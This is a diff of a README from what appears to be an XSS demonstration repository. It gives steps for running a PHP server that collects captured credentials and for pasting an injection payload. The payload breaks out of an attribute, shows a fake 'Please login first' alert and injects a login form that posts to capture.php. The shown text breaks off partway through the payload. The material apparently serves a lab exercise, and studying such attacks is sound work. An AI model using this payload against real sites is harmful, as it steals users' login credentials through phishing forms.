Theshield-crack/xss-demo-vulnerable-app/README2.md

    ?>

-## Start the PHP server
+## Start the PHP server and make sure you get the POST request once after capturing the cred
 php -S 0.0.0.0:8000

-##Form action in your XSS payload should point to:
+## Form action in your XSS payload should point to:
 http://localhost:8000/capture.php

-##Paste the payload in to the query
+## Paste the payload in to the query
 "><script>alert('Please login first');</script>
 <h3>LOGIN</h3>
 <form action='http://localhost:8000/capture.php' method='post'>